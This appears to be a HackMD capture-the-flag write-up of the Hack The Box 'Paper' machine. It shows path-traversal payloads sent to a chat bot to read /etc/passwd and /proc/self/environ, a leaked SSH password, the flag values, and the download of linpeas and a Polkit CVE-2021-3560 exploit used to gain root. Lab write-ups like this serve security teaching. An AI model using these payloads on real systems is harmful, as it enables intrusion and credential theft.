Try   HackMD

[Hack The Box] HTB—Paper

1. Information gathering

Let's begin by scanning

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Useful informations on port 22, 80 and 443. The rest are filtered ports!

Let's check the hostname of the webserver through the response header

​​​​$curl -I http://10.10.11.143

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's map this hostname in /etc/hosts file and try to access the web server

​​​​#/etc/hosts
​​​​
​​​​
​​​​10.10.11.143   office.paper

2. Website exploitation

Let's open the website now

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Penetration Testing kit Add on provided more details on its Tech Stack and many more.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Well, a new host!

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's add it too

​​​​#/etc/hosts
​​​​
​​​​
​​​​10.10.11.143   office.paper
​​​​10.10.11.143   chat.office.paper

Let's access it now

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's create an account and login

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

​​​​recyclops file ../../../../../etc/passwd

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

​​​​recyclops file ../../../../../proc/self/environ

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

​​​​dwight/Queenofblad3s!23

Let's use this creds to have an ssh session on the system

​​​​ssh dwight@10.10.11.143

one, two, three catched the user flag

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

user flag:0edf5f0f21681b3ccefb4151bd9e1eb3

3. Privileges Escalation

Let's download and execute our favorite Linux priviliges escalation tool

​​​​wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

Catched Polkit CVE

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

CVE-2021-3560 poc
https://github.com/Almorabea/Polkit-exploit

Download and run the exploit on the machine

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Got the root flag

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

root flag: f48bd0125f4411b932f0697bc8f4dff7

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
Pacome Kemkeu
A typical man from the IT world✌🏽🙂
0
135

Read more

Research Project I: Deploying a Google Kubernetes Engine cluster in Google Cloud Platform using Terraform and deploying an application

With the continuous iteration and expansion of enterprise applications, the release of applications may involve multiple teams, such as PC, mobile, applet and so on. Application release has also become a high-risk and high-pressure process, as well as the communication of application development iterations, and the testing cost has also become greatly uncontrollable. Today, the concept of DevOps management emerged, CI, CD and powerful deployment automation methods ensure the repeatability of deployment tasks and reduce the possibility of deployment errors.

May 30, 2024
Lab 5 Notes

Passive scan # Complete configuration for DWVA StackHawk Scan app: applicationId: 609d3bcb-bd4a-42d1-bd44-5288e3a477b1 env: Development # The url of your application to scan host: http://192.168.122.244:8080 # (required) hawk:

Nov 22, 2022
Penetration Testing :Solving Timelapse Challenge on HTB

Pacome Kemkeu Djoumessi Timelapse The investigations I conducted through this challenge led me to separate their results into 3 principal chapters: Information Gathering: This is the phase where I used various tools and tried to collect as much information as possible from the target machine and find which were important to conduct further investigation on. Exploitation: This is where the action happened! Here I tried to establish access to the system by exploiting all the hints I could find. Privileges Escalation: In this phase, after accessing the system, I found a way to elevate privileges to become Administrator since the account I obtained during the exploitation phase had low level privileges.

May 21, 2022
OT Lab4 (Malware Analysis)

Task 1: Set up your environment. Prepare and secure malware analysis environment for example FLARE VM. Make sure that VM uses a HOST ONLY network adapter. Use any virtualization environment, better to use the latest version (check repo and official website). Or you can create a Virtual Machine and set it up as a malware analysis environment. Due to some networking issues with KVM, I switched my environment to Virtual Box and reinstalled everything as done previously.

Apr 26, 2022
Read more from Pacome Kemkeu
Published on HackMD